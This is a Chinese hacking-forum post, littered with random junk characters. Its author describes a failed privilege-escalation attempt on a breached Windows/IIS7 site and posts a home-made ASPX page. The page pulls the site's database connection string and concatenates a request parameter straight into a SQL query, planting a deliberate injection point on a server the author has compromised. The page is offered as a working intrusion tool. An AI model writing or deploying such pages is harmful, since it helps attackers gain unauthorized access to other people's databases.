昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。$ o) p9 S2 m8 Y9 f1 b2 L
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。5 n9 ], r7 e+ j. Z
代码量不多,自己写个拉倒了。烦死了。
D0 O: c( X' K0 S6 x- g K
2 [" `5 _! A; _! P0 c3 E
$ j/ |3 T# E- W) V$ [9 g" D0 r1 T<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">+ K# b& p. P* D8 ^9 h/ P$ N
<html xmlns="http://www.w3.org/1999/xhtml">: c) G) d. i' o1 X9 o; W" S
<head runat="server">
0 M1 U; ~7 ?8 a+ r2 ?; ~ <title>暗影aspx构造注射专用页面</title>
" K3 F' N; u6 i</head>4 t$ ~2 f9 ~- o! e5 s7 f
<body>
- T1 i7 o* X% N! J! [1 e( o% P <form id="form1" runat="server">
# j/ s6 L9 E* s, B0 D( v <div>! x8 W( b8 f2 f! s
<script language="c#" runat="server">% M& t, _1 q: n0 ]
3 o& i5 f. M) d: t- G
void page_init(object sender, EventArgs e)
2 e) `: g! J/ W$ e6 C {8 a3 P( X' l* r5 d
) v+ d4 K; T8 i9 R
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();# H0 w3 Y/ R& ]! w! A
& u& w1 F% K: G6 |- @4 C conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();) a! ^6 n& w$ I- b
conn.Open();4 P9 h: n; Q. y4 e4 m$ y& a
, V! m5 L' a5 o* J8 X6 w, Y! `
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
( c4 S& R0 |% e U, Q _
( ?4 T! U5 l+ ]8 } R9 ` System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);2 m a3 z8 s: f6 q' B
int x = command.ExecuteNonQuery();
$ a( _' p3 W# V8 _+ H6 ~- M/ H E Response.Write(i+"\n");9 B+ z% _$ ]) a+ ^" y
Response.Write(x);- w: N1 k, C( S
conn.Close();
4 |$ p/ b7 \9 r$ B, X }
( o7 l5 d0 g7 U S! ^4 K 0 y' c$ K) x! I! w
</script>) _% ~4 o+ M! T% ~8 _1 O& q5 n3 |# l
</div>
/ R9 p6 |+ P+ T% T$ S2 m8 t7 V' l </form>
, S; W2 i& [$ e1 c</body>0 m$ J$ Y8 p$ S& Y- o9 I2 b1 z: u0 l
</html>8 P3 K. I3 Z1 T G
|